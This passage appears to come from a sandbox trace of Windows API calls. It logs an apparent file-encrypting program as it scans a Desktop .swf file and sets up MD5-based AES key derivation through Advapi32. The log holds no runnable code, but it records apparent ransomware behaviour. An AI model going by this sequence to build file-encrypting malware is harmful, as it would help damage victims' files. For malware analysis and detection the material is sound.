lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.547] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.547] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0075.548] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.548] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.548] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.548] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.548] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.548] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.548] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.548] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf", lpFindFileData=0x61e870 | out: lpFindFileData=0x61e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0766700, ftCreationTime.dwHighDateTime=0x1d5e3a8, ftLastAccessTime.dwLowDateTime=0x54cf4160, ftLastAccessTime.dwHighDateTime=0x1d5d880, ftLastWriteTime.dwLowDateTime=0x54cf4160, ftLastWriteTime.dwHighDateTime=0x1d5d880, nFileSizeHigh=0x0, nFileSizeLow=0x68eb, dwReserved0=0x61e9c0, dwReserved1=0x657690, cFileName="WWhoeERioUR.swf", cAlternateFileName="WWHOEE~1.SWF")) returned 0x6b89f8 [0075.548] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0075.548] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.548] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.548] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.549] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.549] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0075.549] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.549] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77710000 [0075.549] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.549] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.549] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0075.549] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.549] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.549] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.549] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.549] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.549] PeekMessageW (in: lpMsg=0x61e57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e57c) returned 0 [0075.549] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.549] CryptAcquireContextA (in: phProv=0x61e550, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x61e550*=0x696ad0) returned 1 [0075.551] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.551] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.551] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0075.551] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.551] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.551] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.551] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.551] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.551] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.551] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.551] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.551] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.551] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.551] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.551] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.551] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0075.552] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.552] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.552] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.552] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.552] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.552] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.552] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.552] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.552] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.552] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.552] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.552] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.552] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.552] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.552] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.552] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.552] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.552] CryptCreateHash (in: hProv=0x696ad0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x61e2c0 | out: phHash=0x61e2c0) returned 1 [0075.553] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.553] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.553] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.553] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.553] CharLowerBuffW (in: lpsz="byte[22]", cchLength=0x8 | out: lpsz="byte[22]") returned 0x8 [0075.553] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.553] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.553] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.553] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.553] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.553] CryptHashData (hHash=0x6b8b38, pbData=0x6f9708, dwDataLen=0x16, dwFlags=0x1) returned 1 [0075.553] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.553] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.553] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.553] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.553] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.553] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.553] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.553] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.553] CryptDeriveKey (in: hProv=0x696ad0, Algid=0x660e, hBaseData=0x6b8b38, dwFlags=0x1, phKey=0x61e2c0 | out: phKey=0x61e2c0*=0x6b8b78) returned 1 [0075.554] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.554] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.554] PeekMessageW (in: 